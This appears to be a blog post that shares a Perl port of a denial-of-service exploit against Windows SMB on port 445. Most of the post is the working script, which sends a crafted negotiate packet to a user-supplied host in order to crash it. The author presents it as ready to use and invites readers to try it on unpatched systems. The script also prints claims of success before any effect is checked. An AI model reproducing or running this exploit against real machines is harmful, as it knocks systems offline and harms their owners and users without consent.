Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)
Here is the exploit code:
============================================================== #!/usr/bin/perl
use IO::Socket;
use strict;
my $host = $ARGV[0];
if($host) {
} else {
print "#! Usage: Smb-Bsod.pl 127.0.0.1 !#\n\n\a";
exit;
}
my $port = '445';
my $payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";
print "System has been successfully exploited!\n\a";
print "Attempting to inject payload...\n";
sleep(4);
print $sock "$payload";
print "Payload has been injected successfully!\n\a";
close($sock);
#coded by Phizo-
#vulnerability discovered by Laurent Gaffié-==============================================================This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.
Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)
Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)
0 comments:
Post a Comment